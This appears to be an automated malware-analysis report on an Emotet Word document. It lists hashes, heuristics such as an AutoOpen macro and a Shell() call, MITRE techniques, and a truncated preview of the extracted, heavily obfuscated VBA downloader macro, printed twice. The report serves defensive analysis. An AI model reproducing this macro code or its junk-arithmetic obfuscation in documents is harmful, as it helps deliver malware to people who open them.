Emotet Office (OLE) malware analysis — malicious · e97bb8e77a2c0a80

MALICIOUS

Office (OLE)

123.9 KB Created: 2018-09-28 09:00:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: ea8d82880bd90135ade8e25a03506b17 SHA-1: 0f5f003b553ae920e7d021a6dbad8af791932de1 SHA-256: e97bb8e77a2c0a80aaac6bcd95cfbdad5b6393d2ef95ac837633926009704af2

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros with an AutoOpen subroutine, which is a common technique for Emotet. The critical heuristic firing for Shell() call in VBA indicates that the macro likely attempts to execute a command or download a payload. ClamAV detection further confirms its malicious nature as Doc.Downloader.Emotet. The embedded URL was confirmed benign, but the presence of the Shell() call and the Emotet family attribution strongly suggest a downloader functionality.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6883996-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6883996-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 68039 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	68039 bytes
SHA-256: `5b19ef9079bce4098f6c1901c4be47f242ef45a7d393db6031dea5ff195dee08`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DKjcGJwViMraN" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim fGrPbm(2) fGrPbm(0) = InStrRev(sYLrRB + zRipCzoaPWQYaBoEtFJzr + cBTiXza, RoZZfSRr + GARWWPwDpqUqjmGtrYp + kACPYboR) + InStr(CdLfwOu + HzzwsAfKwUrdmVMOX + YjOiv, KiwXR + mCKOPwiTklEitadvFYOkO + YATXTwEm) fGrPbm(1) = InStr(BAIfXF + sqcOjcQWORYSwJRztRmzvt + jVQiT, VOUKQ + ZcqVaFqqHtLFrhUb + ZGjwcLa) + InStrRev(NMHmrKJa + vpiIoXuQXnpVAWKWz + wtujwlU, HBUjvuz + FQKXJXXRrnzDVRQOHOlaUp + UkaFYRks) Dim GYBdi(1) GYBdi(0) = InStrRev(AtGiXUHT + mUsoqwidCCqvLwhQRwq + mkYrk, XaBjFm + ZWLFAnwuzDYBjvYo + anjim) + InStr(tcchhQ + mlvQdldrZpUZVnhKzifa + tFSWW, LGtKc + UwvzFwqXovirMHKh + jLUKhfJ) Dim YjWIH(1) YjWIH(0) = InStrRev(HiDfCPC + kXUqpidDGqlOhTwUBswHQz + cJRVX, hNXhiqGm + drtBkJShHrDscbBZ + ToZAGFL) + InStrRev(vFtGmFU + HICppzvzpCPFMTDTBdw + EMmsJ, HVJSdjdz + IlWQOsZsbCAEOBlcLC + Butwu) + InStrRev(hEswVKa + WtTQpkHRIThrWPCUWUuwkN + IHtzjRwG, XMRmcBl + qhdtAbFNcvjDvmBIjPv + TzWDjssM) + InStrRev(DQiOsX + bdWzTinSzdmRfaCFCic + VorWUvJ, LUmbU + ZwZtjhJwznpSzumifZ + XqsjVa) Dim jRMoL(2) jRMoL(0) = InStrRev(ihzjN + jrOOwOJsVpKFdGnNPf + NkjiiCh, IGcTRp + lXYqwBrQDrwzHiBiPji + PQCwB) + InStrRev(QbndH + OjrCSzqJAYUOPLDQObhzsb + aVMiaGJm, jPHTGr + hkwFfwZnUhkzbBIMVzNFdQY + JuUqzRth) + InStr(pPEjTp + YFOzDifdUfTmlhsz + hhUNuwwR, PXGzEaKr + RoZCbidTCaqOXtlIThOP + vhHhLW) + InStrRev(fVsIRlNQ + LTZJjIhjjjdDYzzbwIfZu + wPczv, QEGqmz + fwRMCSUIFNpWpfthKREYoj + TtwuCcz) jRMoL(1) = InStrRev(IhjjiGz + NsbZMLLohbZdfAPiLLMZ + lwtwjLGi, WKujki + PCIiCtDiOjVATPbbSIWUuW + VFizdZ) + InStrRev(JpGuA + TsvkSvTEWQsiNHqci + QFwcJ, VUSXGDb + uNalibNsRbcwLdKcpo + pijCzwZp) + InStr(VvPIni + qjrdIWPvdtzJzkDvYPJ + UNdIHDp, wzGCLZM + kwvHFrwXkjQQPJvtHn + OMMAwQZd) + InStrRev(MZWjNIF + fFvWTpmCiSfJhusXtj + BiRIu, nnqcdhTq + IdWzPGzNzSPiXijrBHvDGqf + wbOEzml) ZPaMhdQ (KeyString(EanqCmj + zDhdbn + 15 + 18 + 34 + Ttmzv + nlaoXQBW) + qIhQo + pPLfzit + KeyString(cpZpd + zCRMr + 17 + 21 + 39 + wjlRk + mfULKfEK) + GwGksmJ + JzmFtI + czJcsikBh + flODdO + lYUKh + YFTwwiZ) Dim cMaQIk(2) cMaQIk(0) = InStrRev(zllOP + bFrIThwTiSZVooEHJYcLw + JLvwO, hWrqQ + jwGlpwVzrwmNzts + YlSUPK) + InStr(RKCYYwda + JpJnOEEAXUXITlvflWf + DmoXl, ndTjR + WOSLJsTMFPFMiukuAjbPiT + juiOrP) + InStrRev(RSKVCp + jIfwatQFWDAvwoimAiqY + JcRtJ, aBjVn + nBOJULAdiRCXDJjokQQbWw + atSSEYqw) + InStrRev(hEiMjJ + GVGQKnlKXXZrNqSBLNdhEK + fKYjH, pImKjihF + bZdUOMzHcNcoCbGplnPkw + fPAWiIP) cMaQIk(1) = InStrRev(ktrRzlm + hMUkDDaQcfMojjXwlwFN + Vtkprz, YOLMuL + DsniQvukQOpbzuLiC + YcfwQSk) + InStrRev(LsRuNZs + jpEalKJmMRjASTLD + uKQiDzw, ZCDJVc + rUvGfYCDqQcuOonfowhNEq + PfTjYmU) + InStrRev(ZYOlNbU + rULNPPkrCJGrQHlPKsqZu + VWtaUN, wEbBQD + uSKciHHaDFwnQHAtNDQh + TSDJlHLO) + InStrRev(HjdjNPtA + LkzJLPJiWikOdDqowthVF + iUjzKQQ, iUtwrrBj + WVARXLLUNdPiPvdkM + ZpjUKr) Dim wDkVK(1) wDkVK(0) = InStr(QuKFcOwq + qISCofIJZdYLRmmvUZQM + ipKTBG, jzaMV + bLpUQrsTvzLuVwjmJpw + SQRiUM) + InStrRev(bXsObrVY + rXEuSlHYfiBidUVZEYGbBkX + zELOO, SPYzj + joNaoPtGVzqYkwCKwaYUU + WCGdCshc) Dim sBaoQ(1) sBaoQ(0) = InStrRev(CImGEwa + dXTcvXiDBvKlDBOVcoCF + sVwGJXz, rnXVJU + lOPTRFluiFiibRAqzbtiw + LOotEA) + InStr(RqESbPML + twiPVXiGJQrkSnXFzdFLjK + YbmkQboC, wsROwhNf + lihWpVMokzbGffYAQv + Ezioi) End Sub Attribute VB_Name = "oKjNRrOpOYTW" Function GwGksmJ() Dim UaYRwN(2) UaYRwN(0) = InStrRev(ALSBl + fNoJoifMaXZiTrUTLtu + UTjXWwdS, FotHDtV + cVXjipbhRLZkpUBDJ + EiBNhdjQ) + InStrRev(WknRzkzs + wAjHVrRisRNwfQVzMrQsU + JjskD, qADutsp + ihYJoHECcuUIPEUhIZ + GkFfMwod) + InStrRev(ZiKwtMB + ibQHLUvfXIcsktSYoGNwmtG + SKIjalPM, uKRSwFz + zQdVdZtUcdOEWwObBGUjd + RWnPtnuZ) + InStrRev(ppiGjEv + PpoUGrXzZcjqHXtFj + fWOXpj, CZwRjz + hvBPzXwpPowJLUvKSF + HCcXDni) UaYRwN(1) = InStrRev(iULKhbVj + havWKqvzkmLwwMUbULGVu + zfTtaiSp, LjShS + JGTYNsmBEiFaEVqEbE + sGzNi) + InStrRev(uBTWM + QmmjiZokazLqOQjzzbS + EhwKdm ... (truncated)

SHA-256: 5b19ef9079bce4098f6c1901c4be47f242ef45a7d393db6031dea5ff195dee08

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DKjcGJwViMraN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim fGrPbm(2)
fGrPbm(0) = InStrRev(sYLrRB + zRipCzoaPWQYaBoEtFJzr + cBTiXza, RoZZfSRr + GARWWPwDpqUqjmGtrYp + kACPYboR) + InStr(CdLfwOu + HzzwsAfKwUrdmVMOX + YjOiv, KiwXR + mCKOPwiTklEitadvFYOkO + YATXTwEm)
fGrPbm(1) = InStr(BAIfXF + sqcOjcQWORYSwJRztRmzvt + jVQiT, VOUKQ + ZcqVaFqqHtLFrhUb + ZGjwcLa) + InStrRev(NMHmrKJa + vpiIoXuQXnpVAWKWz + wtujwlU, HBUjvuz + FQKXJXXRrnzDVRQOHOlaUp + UkaFYRks)
   Dim GYBdi(1)
GYBdi(0) = InStrRev(AtGiXUHT + mUsoqwidCCqvLwhQRwq + mkYrk, XaBjFm + ZWLFAnwuzDYBjvYo + anjim) + InStr(tcchhQ + mlvQdldrZpUZVnhKzifa + tFSWW, LGtKc + UwvzFwqXovirMHKh + jLUKhfJ)
   Dim YjWIH(1)
YjWIH(0) = InStrRev(HiDfCPC + kXUqpidDGqlOhTwUBswHQz + cJRVX, hNXhiqGm + drtBkJShHrDscbBZ + ToZAGFL) + InStrRev(vFtGmFU + HICppzvzpCPFMTDTBdw + EMmsJ, HVJSdjdz + IlWQOsZsbCAEOBlcLC + Butwu) + InStrRev(hEswVKa + WtTQpkHRIThrWPCUWUuwkN + IHtzjRwG, XMRmcBl + qhdtAbFNcvjDvmBIjPv + TzWDjssM) + InStrRev(DQiOsX + bdWzTinSzdmRfaCFCic + VorWUvJ, LUmbU + ZwZtjhJwznpSzumifZ + XqsjVa)
   Dim jRMoL(2)
jRMoL(0) = InStrRev(ihzjN + jrOOwOJsVpKFdGnNPf + NkjiiCh, IGcTRp + lXYqwBrQDrwzHiBiPji + PQCwB) + InStrRev(QbndH + OjrCSzqJAYUOPLDQObhzsb + aVMiaGJm, jPHTGr + hkwFfwZnUhkzbBIMVzNFdQY + JuUqzRth) + InStr(pPEjTp + YFOzDifdUfTmlhsz + hhUNuwwR, PXGzEaKr + RoZCbidTCaqOXtlIThOP + vhHhLW) + InStrRev(fVsIRlNQ + LTZJjIhjjjdDYzzbwIfZu + wPczv, QEGqmz + fwRMCSUIFNpWpfthKREYoj + TtwuCcz)
jRMoL(1) = InStrRev(IhjjiGz + NsbZMLLohbZdfAPiLLMZ + lwtwjLGi, WKujki + PCIiCtDiOjVATPbbSIWUuW + VFizdZ) + InStrRev(JpGuA + TsvkSvTEWQsiNHqci + QFwcJ, VUSXGDb + uNalibNsRbcwLdKcpo + pijCzwZp) + InStr(VvPIni + qjrdIWPvdtzJzkDvYPJ + UNdIHDp, wzGCLZM + kwvHFrwXkjQQPJvtHn + OMMAwQZd) + InStrRev(MZWjNIF + fFvWTpmCiSfJhusXtj + BiRIu, nnqcdhTq + IdWzPGzNzSPiXijrBHvDGqf + wbOEzml)
ZPaMhdQ (KeyString(EanqCmj + zDhdbn + 15 + 18 + 34 + Ttmzv + nlaoXQBW) + qIhQo + pPLfzit + KeyString(cpZpd + zCRMr + 17 + 21 + 39 + wjlRk + mfULKfEK) + GwGksmJ + JzmFtI + czJcsikBh + flODdO + lYUKh + YFTwwiZ)
   Dim cMaQIk(2)
cMaQIk(0) = InStrRev(zllOP + bFrIThwTiSZVooEHJYcLw + JLvwO, hWrqQ + jwGlpwVzrwmNzts + YlSUPK) + InStr(RKCYYwda + JpJnOEEAXUXITlvflWf + DmoXl, ndTjR + WOSLJsTMFPFMiukuAjbPiT + juiOrP) + InStrRev(RSKVCp + jIfwatQFWDAvwoimAiqY + JcRtJ, aBjVn + nBOJULAdiRCXDJjokQQbWw + atSSEYqw) + InStrRev(hEiMjJ + GVGQKnlKXXZrNqSBLNdhEK + fKYjH, pImKjihF + bZdUOMzHcNcoCbGplnPkw + fPAWiIP)
cMaQIk(1) = InStrRev(ktrRzlm + hMUkDDaQcfMojjXwlwFN + Vtkprz, YOLMuL + DsniQvukQOpbzuLiC + YcfwQSk) + InStrRev(LsRuNZs + jpEalKJmMRjASTLD + uKQiDzw, ZCDJVc + rUvGfYCDqQcuOonfowhNEq + PfTjYmU) + InStrRev(ZYOlNbU + rULNPPkrCJGrQHlPKsqZu + VWtaUN, wEbBQD + uSKciHHaDFwnQHAtNDQh + TSDJlHLO) + InStrRev(HjdjNPtA + LkzJLPJiWikOdDqowthVF + iUjzKQQ, iUtwrrBj + WVARXLLUNdPiPvdkM + ZpjUKr)
   Dim wDkVK(1)
wDkVK(0) = InStr(QuKFcOwq + qISCofIJZdYLRmmvUZQM + ipKTBG, jzaMV + bLpUQrsTvzLuVwjmJpw + SQRiUM) + InStrRev(bXsObrVY + rXEuSlHYfiBidUVZEYGbBkX + zELOO, SPYzj + joNaoPtGVzqYkwCKwaYUU + WCGdCshc)
   Dim sBaoQ(1)
sBaoQ(0) = InStrRev(CImGEwa + dXTcvXiDBvKlDBOVcoCF + sVwGJXz, rnXVJU + lOPTRFluiFiibRAqzbtiw + LOotEA) + InStr(RqESbPML + twiPVXiGJQrkSnXFzdFLjK + YbmkQboC, wsROwhNf + lihWpVMokzbGffYAQv + Ezioi)
End Sub


Attribute VB_Name = "oKjNRrOpOYTW"
Function GwGksmJ()
Dim UaYRwN(2)
UaYRwN(0) = InStrRev(ALSBl + fNoJoifMaXZiTrUTLtu + UTjXWwdS, FotHDtV + cVXjipbhRLZkpUBDJ + EiBNhdjQ) + InStrRev(WknRzkzs + wAjHVrRisRNwfQVzMrQsU + JjskD, qADutsp + ihYJoHECcuUIPEUhIZ + GkFfMwod) + InStrRev(ZiKwtMB + ibQHLUvfXIcsktSYoGNwmtG + SKIjalPM, uKRSwFz + zQdVdZtUcdOEWwObBGUjd + RWnPtnuZ) + InStrRev(ppiGjEv + PpoUGrXzZcjqHXtFj + fWOXpj, CZwRjz + hvBPzXwpPowJLUvKSF + HCcXDni)
UaYRwN(1) = InStrRev(iULKhbVj + havWKqvzkmLwwMUbULGVu + zfTtaiSp, LjShS + JGTYNsmBEiFaEVqEbE + sGzNi) + InStrRev(uBTWM + QmmjiZokazLqOQjzzbS + EhwKdm
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.